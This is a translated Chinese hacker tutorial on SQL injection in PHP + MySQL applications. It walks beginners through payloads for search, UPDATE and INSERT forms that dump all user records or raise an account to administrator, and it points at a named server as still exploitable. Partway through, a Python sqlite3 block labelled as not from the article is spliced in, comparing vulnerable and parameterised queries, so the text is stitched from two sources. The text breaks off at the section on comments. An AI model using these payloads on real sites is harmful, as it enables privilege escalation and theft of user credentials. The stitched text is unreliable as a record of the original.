PHP + MySQL injection topic


Author: alpha from: http://www.cnwill.com/

PHP injection is currently one of the most popular attack methods, and its great flexibility attracts many hacking enthusiasts.

Lin.linx has concentrated on various PHP program vulnerabilities and on PHP + MySQL injection, but there have been few articles on the injection problem itself, which leaves us feeling we have not done our best.
OK, in this issue I will explain PHP + MySQL injection to everyone in full. It will surely let you get it all down (who threw that brick?!).
This article is mainly a starter course. If you are an old hand, some of it may be boring, but if you read carefully you will still find a lot of interesting things.

To read this article, you only need to understand the following.

1. Know how a PHP + MySQL environment is built. We include relevant articles on the CD; if you are not clear about how to build the PHP + MySQL environment, please read those first. The topic was also covered in the previous issue.
2. Understand the configuration of PHP and Apache, mainly php.ini and httpd.conf.
In this article we are mainly concerned with php.ini. For security, safe mode is usually enabled in php.ini, that is, safe_mode = On. With display_errors enabled, PHP execution errors return a lot of useful information, so it should be disabled:
with display_errors = Off, the error information from PHP function calls is no longer shown to the user.
In php.ini, magic_quotes_gpc is an important configuration option. Later versions default to magic_quotes_gpc = On; only
older versions default to magic_quotes_gpc = Off, but those antiques are still in use!
What happens when magic_quotes_gpc = On is set in php.ini? Don't worry, the sky will not fall! It only converts every single quote ('), double quote ("), backslash (\) and NUL character in submitted variables into an escaped form prefixed with a backslash, for example ' becomes \'.
This makes us very uncomfortable: many times we have to say bye-bye to string-type injection.
But don't be discouraged, we still have a good way to deal with it. Read on!
3. Have some foundation in PHP and understand a few SQL statements. These are very simple, and we use very few of them, so let's charge!

Let's first look at what we can do when magic_quotes_gpc = Off, and then find a way to deal with magic_quotes_gpc = On.

I. Injection attacks when magic_quotes_gpc = Off
Although magic_quotes_gpc = Off is not safe, and new versions default to
magic_quotes_gpc = On, we still find magic_quotes_gpc = Off on many servers, such as www.qichi.*.
Some programs, such as the vBB forum, strip the escape characters themselves even when magic_quotes_gpc = On is configured, so we can take advantage of them.
Injection methods for magic_quotes_gpc = Off therefore still have a large market.

Next we will explain in detail mysql + php injection in terms of syntax, injection points and injection types.

A: Starting with MySQL syntax
1. First, some basic MySQL syntax, a make-up lesson for the kids who haven't studied properly ~_~
1) select
SELECT [STRAIGHT_JOIN] [SQL_SMALL_RESULT]
select_expression,...
[INTO {OUTFILE | DUMPFILE} file_name export_options]
[FROM table_references
[WHERE where_definition]
[GROUP BY col_name,...]
[ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC],...]
]
These are the commonly used parts. select_expression is the column(s) to retrieve; WHERE restricts the rows, and INTO OUTFILE writes the result of the SELECT to a file. SELECT can also output a value directly, for example:

mysql> select 'a';
+---+
| a |
+---+
| a |
+---+
1 row in set (0.00 sec)
For details see section 7.12 of the MySQL Chinese manual.
Now for some exploitation.
Look at the code first.
This code implements a search.

 

 


......
SELECT * FROM users WHERE username LIKE '%$search%' order by username
......
?>

By the way, % is a wildcard in MySQL. The other wildcards are * and _: * matches field names and % matches field values (note that % must be used with LIKE). The third, the underscore _, has a different meaning from the above: it matches any single character. In the code above we use * to return all fields and %$search% to match all content containing the $search string.

So how do we inject?
Haha, it's similar to ASP.
Submit in the form:
aabb%' or 1=1 order by id #
Note: # is the comment marker in MySQL, meaning the SQL after it is not executed. This is discussed later.
Someone may ask why or 1=1 is used.

Substituted into the SQL statement, the submitted content becomes

SELECT * FROM users WHERE username LIKE '%aabb%' or 1=1 order by id #' order by username

If no username contains aabb, or 1=1 still makes the condition true, so all rows are returned.

We can also do this.

Submit in the form
%' order by id #
or
' order by id #
which become the SQL statements
SELECT * FROM users WHERE username LIKE '%%' order by id #' order by username
and
SELECT * FROM users WHERE username LIKE '%' order by id #' order by username
Of course, all rows are returned,
listing all the users, maybe even the passwords.
This is just one example; more subtle SELECT statements appear below. select really is almost everywhere!
2) Let's take a look at UPDATE.
The MySQL Chinese manual explains it like this:
UPDATE [LOW_PRIORITY] tbl_name SET col_name1=expr1, col_name2=expr2,...
[WHERE where_definition]
UPDATE updates columns of existing rows with new values. The SET clause specifies which columns to modify and the values to give them. The WHERE clause, if given, specifies which rows to update; otherwise all rows are updated.
For more information see section 7.17 of the MySQL Chinese manual. Here we go into detail.
As the above shows, UPDATE is mainly used to update data, such as editing articles and modifying user data. We seem more interested in the latter, because...
Look at the code first.
Here is the table structure so you can follow along.
create table users (
id int(10) not null auto_increment,
login varchar(25),
password varchar(25),
email varchar(30),
userlevel tinyint,
primary key (id)
)
userlevel is the user level: 1 is administrator and 2 is an ordinary user.
// change.php
......
$sql = "UPDATE users SET password=$pass, email=$email WHERE id=$id";
......
?>
OK, let's start injecting. We enter this as the e-mail address:
netsh@163.com, userlevel=1
The SQL statement becomes
UPDATE users SET password=youpass,
email=netsh@163.com, userlevel=1 WHERE id=youid
Let's check: our userlevel is 1, and we have become administrator.
Haha, so cool, an essential for home and travel.
Here we briefly mention the single-quote closure problem. If a single quote is opened but no matching single quote closes the pair, the system returns an error. Column types are mainly numeric, date, time and string. Quotes are generally used with string types and generally not with numeric types (they can be used, though, and then the power is huge). Date and time types are rarely used for injection (there are very few time variables to submit). These injection methods are detailed below!

3) Next it's INSERT's turn, like the students queueing in the canteen at noon.
The PHP Chinese manual teaches us this:
INSERT [LOW_PRIORITY | DELAYED] [IGNORE]
[INTO] tbl_name [(col_name,...)]
VALUES (expression,...),(...),...
INSERT inserts new rows into an existing table. The INSERT ... VALUES form inserts rows based on explicitly specified values; the INSERT ... SELECT form inserts rows selected from another table. The multi-row INSERT ... VALUES form is supported from MySQL 3.22.5, and the col_name=expression syntax from MySQL 3.22.10.
So when we cannot see the back end, INSERT mainly appears at registration, or wherever else there is a submission.

Look at the table structure first
create table membres (
id varchar(15) not null default '',
login varchar(25),
password varchar(25),
email varchar(30),
userlevel tinyint,
primary key (id)
)
We again assume userlevel is the user level: 1 is administrator and 2 is an ordinary user.
The code is as follows:
// reg.php
......
$query = "insert into membres VALUES ($id, $login, $pass, $email, 2)";
......
?>
The user level inserted by default is 2.
Now let's build the injection statement.
Enter the e-mail address as:
netsh@163.com, 1)#
The executed SQL statement becomes:
insert into membres VALUES (youid, youname, youpass, netsh@163.com, 1)#, 2)
We have registered as administrator.
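Added example (not from the article): the change.php UPDATE and the earlier LIKE search, simulated in Python with sqlite3 standing in for MySQL, with the string-built query beside its prepared-statement form. It assumes the usual quoted form of the UPDATE (the article writes the values without quotes), so the article's email payload carries an extra closing quote; the same placeholder fix applies to reg.php's INSERT.

```python
import sqlite3

# Constructed stand-in for the article's users table; sqlite3 replaces MySQL
# so the example runs offline (the string-vs-placeholder behaviour is the same).
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, login VARCHAR(25),
    password VARCHAR(25), email VARCHAR(30), userlevel TINYINT);
INSERT INTO users VALUES (1, 'admin', 'secret', 'admin@example.com', 1);
INSERT INTO users VALUES (7, 'netsh', 'oldpass', 'old@example.com', 2);
"""

# The article's ", userlevel=1" email payload, plus the quote that the quoted
# template below needs to close the email literal (assumed form).
PAYLOAD = "netsh@163.com', userlevel=1, login='netsh"

def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def change_vulnerable(conn, uid: int, password: str, email: str) -> None:
    """change.php as written: values are pasted into the SQL text, so a quote
    inside the email ends the literal and the rest is parsed as SQL."""
    sql = f"UPDATE users SET password='{password}', email='{email}' WHERE id={uid}"
    conn.execute(sql)
    conn.commit()

def change_prepared(conn, uid: int, password: str, email: str) -> None:
    """Hardened form: placeholders send the values separately from the SQL,
    so the same payload is stored verbatim and userlevel is untouched."""
    conn.execute("UPDATE users SET password=?, email=? WHERE id=?",
                 (password, email, uid))
    conn.commit()

def search_users(conn, term: str) -> list:
    """The article's LIKE search, parameterised. The placeholder neutralises
    the quote/comment payload, but % and _ in user input are still LIKE
    wildcards, so they are escaped and an explicit ESCAPE clause is given."""
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    rows = conn.execute(
        "SELECT login FROM users WHERE login LIKE ? ESCAPE '\\' ORDER BY login",
        (f"%{escaped}%",))
    return [row[0] for row in rows]

def user_row(conn, uid: int) -> tuple:
    """(email, userlevel) of one user, for checking the effect of an update."""
    return conn.execute("SELECT email, userlevel FROM users WHERE id=?",
                        (uid,)).fetchone()
```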
What does # mean? Don't tell me you've forgotten already, so fast? Dizzy.
Fine, let's talk about it in detail.

2. Now let's talk about comments in MySQL. This is very important; no dozing off. If you sleep through to the exam, you'll go down.
